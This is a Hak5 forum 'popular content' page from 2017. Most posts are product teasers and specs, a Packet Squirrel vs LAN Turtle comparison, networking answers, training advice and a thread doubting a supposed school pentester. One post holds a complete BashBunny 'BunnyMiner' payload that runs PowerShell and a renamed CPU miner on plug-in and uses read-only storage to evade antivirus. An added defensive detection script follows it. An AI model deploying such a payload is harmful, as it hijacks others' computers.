Hak5 Forums


Popular Content

Showing content with the highest reputation since 09/23/2017 in all areas

  1. 9 points
    I think we may do a pre-order next week leading up to the launch on Friday, but it wouldn't be publicized really. Just something special for us cool peeps on the forums & IRC.
  2. 6 points
  3. 6 points
    Just working on securing a venue for a Hak5 event in San Francisco mid October to introduce you all to our new furry friends. 🐿️🐿️🐿️
  4. 5 points
    Here are the official specs:
        Atheros AR9331 SoC at 400 MHz MIPS
        16 MB Onboard Flash
        64 MB DDR2 RAM
        2x 10/100 Ethernet Port
        USB 2.0 Host Port
        4-way payload select switch
        RGB Indicator LED
        Scriptable Push-Button
        Power: USB 5V 120mA average draw
        Dimensions: 50 x 39 x 16 mm
        Weight: 24 grams
  5. 5 points
    I do enjoy reading posts like this while having a coffee :) never fail to entertain. Makes me wonder if it's one of you lot doing a windup :P
  6. 5 points
    Sample code! https://pastebin.com/aZyyS16w
  7. 5 points
    Currently working on a PoC - we'll see how well it works.
  8. 5 points
    Pre-orders would be filled day of release on the morning of the 20th. I'll update this thread early next week when it's ready -- I just need to coordinate with Sara and Jayson first to make sure this doesn't break anything =P
  9. 4 points
  10. 4 points
    The needle on the bullshit meter just flew off. Having worked and occasionally still work for school districts in the US, I can say that yes, the school can confiscate anything that a student uses on school property that damages the property. The network is school property.
  11. 4 points
    So sad to hear of the passing of Kerby...after so many years, I know how it feels. And Kerby loved to be on camera.... Darren, you have my greatest sympathy...
  12. 3 points
    Hey everyone, Version 1.4 of the Bash Bunny firmware is now available! With it comes an important fix which will prevent the device from boot-looping when an invalid update file is put onto the root of the Bash Bunny's storage partition. A bug in the Bash Bunny's QUACK command has also been fixed and all underlying packages have been updated. Find all the fixes and features in the changelog and bounce on by to BashBunny.com/downloads for your devious device download (\_/)
  13. 3 points
    You forgot

        NETMODE TRANSPARENT
        wget https://packetsquirrel.com
        BUTTON 1m && {
            echo "Discount unlocked!"
            LED FINISH
        } || {
            echo "Timeout dude!"
            LED FAIL
        }
  14. 3 points
    From the picture of: https://twitter.com/digininja It reads: The packet squirrel by Hak5 is a pocket sized Ethernet multi-tool for penetration testers and system administrators. Packet captures, MITM and remote access are made easy with its simple scripting language. online payload library and initiative interface. Flip the switch to desired payload, plug it in and get instant feedback from the multi-color LED.
  15. 3 points
    Soon-ish :-P Or one of my favorite things I did at DerbyCon 2016 booth...
  16. 3 points
    This was a very entertaining read. Thanks for the chuckle.
  17. 3 points
    By the way, does this look like a pentester, or some kids? https://twitter.com/jonbush1234 Where the profile pic for "Clarence" comes from. https://twitter.com/jonbush1234/status/914948133163061249 looks like maybe Mr "Clarence" needs help learning how to use his new rubber ducky. @Clarence will the real slim shady please stand up - https://www.twitch.tv/videos/173897157 After some digging, looks like he is 15yrs old, born in 2002. How long before a thread lock? I think he's suffered enough...
  18. 3 points
    This. Sorry, I don't believe for a moment that you aren't allowed to confiscate it. Schools are well within their rights to confiscate mobile phones, knives, and anything else they deem unsafe, inappropriate or a breach of their rules. The Rubber Ducky falls within this.
  19. 3 points
    They deliberately left out a part that said the students couldn't attack your network to make the job of a pen tester easier. Your first message sounded suspicious, this is now incompetent and suspicious.
  20. 3 points
    Confiscate the ducky and read the script.
  21. 3 points
    ::cracks knuckles:: Time to fire up Burp Suite.
  22. 3 points
    Yes. $0 if you're one of the first 100 at the party. $40-50 if you're not. There'll be other new devices too -- it's not just a Packet Squirrel launch party, it's an entire Hak5 Gear event ^_^
  23. 3 points
    Posting this to the community here first. Goes live in the morning 😉 https://hak5.org/rsvp Hope to see you in San Francisco - and if not IRL, soon after here ☺ 🐿️🐿️🐿️
  24. 2 points
    The Hak5 Gear Ethernet line consists of the Packet Squirrel and LAN Turtle (classic, SD, 3G). The LAN Turtle and Packet Squirrel are well suited for similar applications - remote access, man-in-the-middle attacks, packet sniffing, secure tunneling and network recon. Their biggest differences are their hardware (interfaces and appearance) and software (modules vs payloads). This affects how they are deployed, their stealth factors (for covert ops) and what actions are performed.

    Key Differences

    The LAN Turtle is best suited for long-term deployments at a client's facility to provide penetration testers with remote access to their network. Typically a social engineering operation is to plant a LAN Turtle on the target network with retrieval when the engagement has ended. Disguised as a USB Ethernet adapter, the LAN Turtle can provide this role uninterrupted. If remote access is guaranteed up front, the LAN Turtle (3G especially) can be shipped to the client site with simple instructions for deployment.

    The Packet Squirrel is an Ethernet multi-tool. It can provide a range of penetration testing functions, though it is equally suited for IT professionals and tech enthusiasts. The barrier to entry is lower since it relies on a simpler payload system of scripts. With the right scripts it can generally perform all of the functions of the LAN Turtle, however it is not as stealthy. Depending on how it is concealed it may not be as effective at long term deployments as the LAN Turtle.

    Applications

    Remote Access: Both are capable of providing encrypted remote access into a network. The LAN Turtle may be more stealthy - disguised as a USB Ethernet adapter - and the 3G version bypasses perimeter defenses by bringing its own Internet backhaul.

    Man-in-the-Middle: The LAN Turtle can only perform MITM attacks against computers while the Packet Squirrel can be plugged inline between any two arbitrary Ethernet links (before computers, network printers, IP cameras and the like).

    Packet Sniffing: The Packet Squirrel is best suited to capturing packets to USB disks between any Ethernet segment using the built-in tcpdump payload. The LAN Turtle SD works similarly, logging to an internal MicroSD card - but only against a single computer.

    Secure Tunneling: Both devices can be used to secure network traffic, however the Packet Squirrel is better suited for this task using its built-in openvpn payload. Only minimal configuration is required and any network device may benefit from it as a hardware VPN router. The LAN Turtle can perform this task, albeit only for a single computer using a module.

    Network Recon: Both devices are equally capable of performing network reconnaissance, e.g. nmap scans. Typically these scans are completed within a few minutes and do not require a large amount of storage. Currently (10-22-17) an nmap module is available for the LAN Turtle while a similar payload for Packet Squirrel is not. That said, a payload is expected soon and when it arrives the user experience will be easier, considering the Packet Squirrel's hardware.

    Software

    The LAN Turtle uses a module system while the Packet Squirrel uses a payload system. Both modules and payloads are free open source software add-ons contributed by the community and available from a central git repository.

    Modules are downloaded to the device "over the air" and come with their own interface for configuration. Setting up a module usually entails entering a few key pieces of data into a graphical user interface. Multiple modules may be enabled to run simultaneously when the device is deployed.

    Payloads are downloaded to the device manually, or via an updater app, in the form of one or more text files. Configuring a payload consists of editing the text file and changing values, typically at the beginning of the file. Multiple payloads may be carried and assigned to the various switch positions, however only one payload may run at once.

    Hardware

    Interfaces: The Packet Squirrel features two standard RJ45 Ethernet jacks and can therefore be installed inline between most any network segment. The LAN Turtle features one standard RJ45 Ethernet jack and one standard USB Type-A plug for power and USB Ethernet. Because of this it may be powered from any ordinary USB power source and connected to a network, however it can only be planted inline between a computer and network.

    Power: Both may be battery powered, but in the case of the LAN Turtle powering from a USB battery means that it is no longer suited for inline (MITM, Packet Sniffing) applications. Both have very low (~100-200 mA) power draw, so running off high capacity USB battery banks is a possibility.

    Feedback: The Packet Squirrel features an RGB LED for feedback. Its LED command is compatible with the Bash Bunny LED syntax, so standard payload states are easily distinguished. The LAN Turtle typically provides feedback to the penetration tester via software, e.g. the establishment of an SSH reverse shell. While it features two static programmable LED indicators, one yellow and one green, modules seldom take advantage of this hardware.

    Setup: The LAN Turtle has no special hardware for setup -- all modules are enabled or disabled in software. The Packet Squirrel provides a payload selection switch allowing the operator to choose the appropriate payload at runtime.

    Interaction: The Packet Squirrel provides a button for interaction with payloads. The LAN Turtle's button is not exposed to the user (inside case) and is only used for reset and recovery.
  25. 2 points
    It's a great companion to the USB attack tools, with the right payload. You'll see. Basically drop the Squirrel as a listener for an accompanying payload on the Duck/Bunny. Working on something special for that. Also, noted hardware request.
  26. 2 points
    I got you fam. Preshow: The main event: I was there. It was dope.
  27. 2 points
  28. 2 points
    Heh, made you look! 🤣😂🤣😂🤣😂
  29. 2 points
    https://github.com/michael-weinstein/veraT It gets the tumor and normal tissue DNA exomes and the tumor RNA. It extracts the patients HLA type (immune system markers) form the normal tissue DNA, finds the tumor-specific mutated proteins by comparing the tumor and normal DNA, and then looks at the RNA to figure out if the mutated proteins are likely being made. It then takes the mutated protein sequences and the HLA types and predicts which of these mutant proteins are going to be best presented to the immune system, which essentially gives the most immune-vulnerable changes in the cancer. Once that happens, we can try to target those things for an immune response.
  30. 2 points
  31. 2 points
    It's a script to test for the vuln, not the attack script: "Remember that this is not an attack script!" & "we are already releasing this code because the script got leaked"
  32. 2 points
    Interesting. If I can confirm this issue, we'll get it fixed and pushed out Friday.
  33. 2 points
    Kid, don't run any ducky scripts anybody gives you here. At this point, they're all going to be rm -rf / and fork bombs. Also, there's very little interesting stuff you can run on a chromebook that's not rooted and running... uh... not chromeOS.
  34. 2 points
    Ok. Who is "we"? Because "you" the pentester aren't the one who secures the network (generally), you're the one who breaks and tests the network, then makes recommendations on what to fix to the IT and Security team for the organization. If you are running iboss, and not "they" are running iboss, these are 2 different things. Who's in charge of the network? Are you the IT person who is implementing the network setup, part of the NOC/SOC, etc?

    What difference does it make how it happened? Will recreating it change anything? Sure, it helps when patching, but if there is a hole, find the hole, patch the hole. You're the "pentester", hired to find weaknesses in the system. If "we" set this up, then "we" should double check and test our setup. I'd bet money there are probably multiple ways around this firewall restriction, so knowing how the student did it is only one of them.

    If you are in fact the person in charge of the network, vs some outside contractor hired to break into and test the network, then you should have intimate knowledge of the firewall, the network topology, client and server machines, their setup configurations, permissions on the network, shares, etc, and where to start filtering and checking things, applying DNS and proxy filtering, vlans, etc. While it should be trivial in most cases with tunneling or VPNs to bypass most of this stuff on the firewall, if the kid is abusing the network, you DO NOT LET THE KID BACK ON THE NETWORK, and revoke their privileges. Even if "bypassing the firewall" is not explicitly listed as a rule in the student agreement/policy, it should surely have something that states access is a privilege granted, not a right, and can be taken away for abuse. As school staff for the IT team, even if just one person, you should have intimate knowledge of your perimeter and the network setup, and if you don't, there are probably way more pressing issues to fix vs one kid bypassing the firewall.

    What is the network sign-in policy, how do they get access to the network, are they proxied natively so they can't access DNS and outside sites, what prevents anyone from plugging into the network with BYOD, rogue APs, etc? Either this network is wide open, or you're not telling us the whole story, or as others said, total BS. This doesn't pass the smell test, and most pentesters won't discuss client info on an open forum, as they probably have an NDA in most cases. Not saying it's a 100% fabricated lie; sure, many schools have clueless network admins who are often at the mercy of the students, or just school staff/teachers/office personnel left to set this up, but if they can hire a "pen tester", they can surely hire a network admin and some IT people who know what is up with their network. You are either in over your head or should just come out and state you're trying to bypass the IBoss firewall.
  35. 2 points
    ... Stop. Just stop. You are paid to do a job, they don't have to pay you less due to leaving out part of an AUP. At this point I am convinced you are lying, and are a student trying to get around a firewall in your school by having us write a script for a USB Rubber Ducky for you.
  36. 2 points
    Really? So if a student breaches your school's security, and in doing so breaks the Acceptable Use Policy that you would have gotten them and their parent to sign, you cannot confiscate the equipment they used to do so, even if by their actions they could be breaking data protection laws? While I am not based in the US, and am not a lawyer, I do work with schools, and we have had similar attempts. I am EXTREMELY sceptical of your statements here...
  37. 2 points
  38. 2 points
    $40-50 for the packet squirrel? What about the other two? How much to get all three?
  39. 2 points
    Maybe relevant? https://depthsecurity.com/blog/unauthorized-flir-cloud-access
  40. 2 points
    BunnyMiner By Ar1k88

    I'm going to "quietly" sneak this onto the thread...

    **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PC'S! MYSELF, & MINERGATE DO NOT ENCOURAGE SUCH USE! ****

    Anyways, this is just a Simple CPU Miner from my Collection of Odd Scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner, yes it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :)

    payload.txt

        #!/bin/bash
        #
        # Title: USB CPU Miner
        # Author: Ar1k88
        # Version: 1.1g
        # Target: Windows 7-10
        # Category: Exploiting Resources
        # Sub-Category: Cryptocurrency
        #
        # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing
        # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB.
        #
        # Please change the credentials in "config.txt" to this format:
        # <algorithm>
        # <pool stratum>
        # <username/wallet>
        # <cores/threads>
        #
        # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to
        # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip
        # Extract the EXE's and use the x86 (32Bit) version due to it supports both 32Bit and 64Bit CPU
        # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe".
        # Enjoy! -Ar1k88

        # Grace-period for PC to recognize the BashBunny.
        Q DELAY 300

        # Setting up and Attacking! CHARRRRGGGEEE!!!
        LED ATTACK

        # NOTE: Setting to Read-Only Storage to prevent Anti-virus's from removing binary files. (EXE's)
        ATTACKMODE HID RO_STORAGE
        RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')"
        LED FINISH

    1.cmd

        @echo Off
        cls
        REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is.
        REM -Ar1k88
        SetLocal EnableDelayedExpansion
        Set n=
        Set ConfigFile=%~dp0\config.txt
        For /F "tokens=*" %%I IN (%ConfigFile%) DO (
            Set /a n+=1
            Set var!n!=%%I
        )
        echo %var3%
        call %~dp0\2.exe -a %var1% -o %var2% -u %var3% -p x -t %var4%
        pause
        EndLocal
        @exit /B

    Config.txt is set up as follows:

        <algorithm>
        <stratum>
        <email/wallet>
        <threads/cores>

    config.txt

        cryptonight
        stratum+tcp://aeon.pool.minergate.com:45550
        [email protected]
        2

    Enjoy!

    P.S. - If you want to sign up to show this off to your friends or for work, you can easily create an account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88
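What a defender would want beside this post is a way to spot such a launch on a workstation. The following is an added example, not the payload author's code and not anything from Hak5: it scans constructed process-creation log lines for the traces the payload above leaves (a stratum+tcp pool URL, cpuminer-style -a/-o/-u arguments, a volume looked up by label through win32_volume, and a binary run from a non-system drive), scores them, and walks the parent chain so the alert shows which PowerShell command started the miner. The log format, host name, PIDs, pool and wallet values are all made up, and the drive-letter check assumes a single system drive.

```python
"""Flag process-creation events whose command lines look like a CPU miner launch.

Added example for this thread (not the payload author's code). The log format
and every event below are constructed; the indicators mirror what the
BunnyMiner payload leaves behind on a host: a pool URL with a stratum+tcp
scheme, cpuminer-style -a/-o/-u arguments, a volume located by label through
win32_volume, and a binary executed from a non-system drive.
"""
import re
from typing import Dict, List

# Constructed events, one per line: ts, host, pid, ppid, image, cmdline (tab-separated).
SAMPLE_LOG = "\n".join([
    "2017-10-22T10:15:00Z\tPC1\t4100\t900\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tpowershell .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\switch1\\1.cmd')",
    "2017-10-22T10:15:01Z\tPC1\t4120\t4100\tC:\\Windows\\System32\\cmd.exe\tcmd /c E:\\payloads\\switch1\\1.cmd",
    "2017-10-22T10:15:02Z\tPC1\t4130\t4120\tE:\\payloads\\switch1\\2.exe"
    "\t2.exe -a cryptonight -o stratum+tcp://pool.example.invalid:45550 -u wallet@example.invalid -p x -t 2",
    "2017-10-22T10:16:00Z\tPC1\t4200\t900\tC:\\Windows\\System32\\notepad.exe\tnotepad.exe C:\\notes.txt",
    "2017-10-22T10:17:00Z\tPC1\t4300\t900\tD:\\tools\\7z.exe\t7z.exe a -t7z backup.7z C:\\data",
])

STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://", re.IGNORECASE)
# cpuminer-style launch: algorithm (-a), pool (-o) and user/wallet (-u), in any order.
MINER_ARG_RES = [re.compile(r"(?:^|\s)-a\s+\S+"),
                 re.compile(r"(?:^|\s)-o\s+\S+"),
                 re.compile(r"(?:^|\s)-u\s+\S+")]
# Enumerating a volume by label is how the payload finds its own storage.
VOLUME_LABEL_RE = re.compile(r"win32_volume.*label=", re.IGNORECASE)
SYSTEM_DRIVE = "C:\\"  # assumption: single-system-drive workstations; adjust per fleet

WEIGHTS = {"stratum_url": 5, "miner_args": 3, "volume_label_lookup": 3, "non_system_drive": 1}
ALERT_THRESHOLD = 3  # a lone launch from a non-system drive (weight 1) is not enough to alert


def parse_event(line: str) -> dict:
    """Split one constructed tab-separated log line into a dict."""
    ts, host, pid, ppid, image, cmdline = line.split("\t", 5)
    return {"ts": ts, "host": host, "pid": int(pid), "ppid": int(ppid),
            "image": image, "cmdline": cmdline}


def indicators(event: dict) -> List[str]:
    """Names of the miner-launch indicators present in one event."""
    cmd = event["cmdline"]
    found = []
    if STRATUM_RE.search(cmd):
        found.append("stratum_url")
    if all(r.search(cmd) for r in MINER_ARG_RES):
        found.append("miner_args")
    if VOLUME_LABEL_RE.search(cmd):
        found.append("volume_label_lookup")
    if not event["image"].upper().startswith(SYSTEM_DRIVE.upper()):
        found.append("non_system_drive")
    return found


def score(found: List[str]) -> int:
    return sum(WEIGHTS[name] for name in found)


def process_chain(events: Dict[int, dict], pid: int) -> List[str]:
    """Image paths from the given process up through its ancestors known to the log."""
    chain, seen = [], set()
    while pid in events and pid not in seen:
        seen.add(pid)
        chain.append(events[pid]["image"])
        pid = events[pid]["ppid"]
    return chain


def scan_log(text: str) -> List[dict]:
    """Return one alert per event whose indicator score reaches the threshold."""
    events: Dict[int, dict] = {}
    for line in text.splitlines():
        if line.strip():
            ev = parse_event(line)
            events[ev["pid"]] = ev
    alerts = []
    for ev in events.values():  # insertion order == log order
        found = indicators(ev)
        total = score(found)
        if total >= ALERT_THRESHOLD:
            alerts.append({"pid": ev["pid"], "score": total, "indicators": found,
                           "chain": process_chain(events, ev["pid"])})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"pid {alert['pid']} score {alert['score']} {alert['indicators']}")
        print("  chain: " + " <- ".join(alert["chain"]))
```

The weights and threshold are starting points rather than tuned values; the point of scoring is that one weak signal on its own (an archiver run from a USB drive, like the 7z line) does not alert, while the volume-label lookup is specific enough to alert by itself and the miner line is caught on its arguments even though the binary was renamed to 2.exe.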
  41. 2 points
    If you don't have a background in Information Technology, ie: no formal training, at a minimum, get some basic classes in. If you truly know your networking and sysadmin stuff, then sure, take a gander at SANS and Offsec, but don't just jump in if you don't have some sort of foundational grasp of things. CompTIA Network+, Linux+ (even an A+ class, but not required) and a basic Windows MCP class should be enough to grasp most things needed for the security side, but most people in penetration testing started on the LAN side or as System Administrators with networking backgrounds before going to the other side. Not a requirement, but it will make your life much easier before trying a pentesting course. Knowing TCP/IP basics, the OSI model, and some form of file sharing and network administration, ie: Active Directory, SMB/Samba, and Windows and Linux OS command line use, will greatly help you in the long run.

    Offsec's PWK is more or less entry level pentesting, but I wouldn't consider it an easy course by any means. It's very foundational, and very instructional, but it's 100% hands on: you need to physically do the task to pass. Part video, part text instructional, you'll spend most of your time in a VPN'ed virtual lab, performing real attacks against actual installed machines set up with real world vulnerabilities or mis-configurations, all networked like a real corporate network, allowing you to attack one machine and pivot through the network to others.

    SANS is also a really good class, but I wouldn't consider either theirs or Offsec's to be "hey, took the class, now I'm a pro". It will definitely build the mindset needed to be a pentester, and both will allow you to physically do the things you would in a pentest. SANS is a number of courses, some of which may only be instructional with multiple choice questions; OSCP and other Offsec courses are all hands-on, you have to perform actual hacking tasks to pass, and there are no multiple choice questions. You also have to write an actual pentest report, which is a part of your passing grade as well, so don't just pass that part up, because it's what you would need to know and do well in the real world if doing the same thing for your job.

    If you have no background in any of the above I mentioned, start out gradually and build on the basics. Cybrary, YouTube, Google and SecurityTube can help. Look into the following materials; you don't have to take the certifications, but can still read the books on the topics to get more well rounded:

        CompTIA Network+
        CompTIA Linux+
        CompTIA Security+
        Microsoft MCP books for MCSA/MCSE

    Set up a home lab with some virtual machines, set up a domain controller with Windows Server and an Active Directory domain, network some client computers to it, and try out some CTFs from places like Vulnhub or Hack The Box, as well as Pentester Academy. Then I'd work on PWK/OSCP and then maybe SANS.
  42. 2 points
    Yep, I've got a links page for each device, linked in the main "README.md". I'll add the Github Wiki for the Pineapple to the Pineapple's links page and add the Hak5 Github to the main README though, thanks.
  43. 2 points
    You could buy a cheap router that will take openwrt. Plug the wan side into your existing router and run WiFi and wired off openwrt instead. You'd then have a Linux box you could ssh to and use tools like tcpdump to watch traffic as you would be in the middle of everything.
  44. 2 points
    Question one: I can put whatever IP I want in a device, it doesn't have to use DHCP. An IP of with a netmask of and default gateway of may work fine on your network depending on the setup. Question two: you plugged into a switch, not a hub. You being in promiscuous mode means you see everything you are sent, but the switch will only send you traffic meant for you, which means your IP and broadcast traffic. What you are expecting is what you'd get off a hub or a span port.
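The switch-versus-hub point in the answer above, as an added example that is not part of the original post: a small Python model of a learning switch, a hub, and a mirror (SPAN) port, with a constructed set of hosts and frames, reporting which frames a promiscuous sniffer on port 3 captures in each case. It goes one step beyond the answer by also showing the case the switch's MAC table has not learned yet: a unicast frame to a destination the switch does not know is flooded out of every port, so the sniffer does see that one, which is why a capture on a switch port shows a few stray unicast frames right after hosts come up.

```python
"""Which frames a sniffer captures on a hub, a switch port and a SPAN port.

Added example for this thread (not from the original post). Hosts, MAC
addresses and the frame sequence are constructed. The switch is a minimal
learning switch: it records the source MAC of each frame against the ingress
port, floods broadcast and unknown-destination frames out of every other port,
and forwards a known destination out of exactly one port. A SPAN port receives
a copy of everything in addition to its own traffic.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass
class Frame:
    src: str
    dst: str
    note: str


@dataclass
class Host:
    mac: str
    promiscuous: bool = False
    seen: List[int] = field(default_factory=list)  # indexes of frames captured

    def receive(self, index: int, frame: Frame) -> None:
        # A NIC in normal mode discards frames that are neither for it nor broadcast;
        # promiscuous mode passes every frame the port actually receives to the capture tool.
        if self.promiscuous or frame.dst in (self.mac, BROADCAST):
            self.seen.append(index)


class Hub:
    """Repeats every frame to every port except the one it arrived on."""

    def __init__(self, ports: Dict[int, Host]) -> None:
        self.ports = ports

    def forward(self, index: int, frame: Frame, ingress: int) -> None:
        for port, host in self.ports.items():
            if port != ingress:
                host.receive(index, frame)


class Switch:
    """Learning switch with an optional mirror (SPAN) port."""

    def __init__(self, ports: Dict[int, Host], span_port: Optional[int] = None) -> None:
        self.ports = ports
        self.span_port = span_port
        self.mac_table: Dict[str, int] = {}

    def forward(self, index: int, frame: Frame, ingress: int) -> None:
        self.mac_table[frame.src] = ingress  # learn which port the sender is on
        known = self.mac_table.get(frame.dst) if frame.dst != BROADCAST else None
        if known is not None:
            targets = [known]  # unicast to a learned MAC goes out one port only
        else:
            targets = [p for p in self.ports if p != ingress]  # broadcast / unknown: flood
        if self.span_port is not None and self.span_port not in targets:
            targets.append(self.span_port)  # mirror everything to the SPAN port
        for port in targets:
            self.ports[port].receive(index, frame)


def run_scenario(device: str, promiscuous: bool = True) -> List[int]:
    """Return the indexes of the frames the sniffer on port 3 captures."""
    a = Host("aa:aa:aa:aa:aa:01")
    b = Host("bb:bb:bb:bb:bb:02")
    sniffer = Host("cc:cc:cc:cc:cc:03", promiscuous=promiscuous)
    ports = {1: a, 2: b, 3: sniffer}
    if device == "hub":
        dev = Hub(ports)
    elif device == "switch":
        dev = Switch(ports)
    elif device == "span":
        dev = Switch(ports, span_port=3)
    else:
        raise ValueError(device)
    port_of = {h.mac: p for p, h in ports.items()}
    frames = [
        Frame(a.mac, b.mac, "A->B before the switch has learned B's port"),
        Frame(b.mac, a.mac, "B->A, A's port already learned"),
        Frame(a.mac, b.mac, "A->B, both ports now learned"),
        Frame(a.mac, BROADCAST, "A broadcasts (e.g. an ARP request)"),
        Frame(a.mac, sniffer.mac, "A->sniffer"),
    ]
    for i, f in enumerate(frames):
        dev.forward(i, f, port_of[f.src])
    return sniffer.seen


if __name__ == "__main__":
    for device in ("hub", "switch", "span"):
        print(f"{device:6s} promiscuous sniffer sees frames {run_scenario(device)}")
    print(f"switch non-promiscuous sniffer sees frames {run_scenario('switch', promiscuous=False)}")
```

On the plain switch the sniffer ends up with frames 0, 3 and 4 (the not-yet-learned unicast, the broadcast, and the frame addressed to it); on the hub and on the SPAN port it gets all five; and with promiscuous mode off it gets only frames 3 and 4 no matter which device is in the middle, which is the "everything you are sent" half of the answer.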
  45. 2 points
    Why wipe the machine? If you created a new user, take ownership of the old account/files, and move their files over to the new profile, then nuke the old user profile. I actually do this for people when I fix their machines and they've broken their profile somehow. No need to reinstall everything unless you believe there is malware on it.
  46. 2 points
    @Darren Kitchen. Do we get any hints? We have been waiting for weeks to catch even the slightest details!!!
  47. 2 points
    The last I have heard is that more details will be available in early October. When / how is up to Darren :) I'd love to say more, but my hands are tied.
  48. 2 points
  49. 2 points
    Throw us a bone, @Sebkinne! :)
  50. 2 points
    Ahem... So does being mid Sept. constitute appeasing our endless anticipation with at least another hint? Can't blame a fellow for trying right...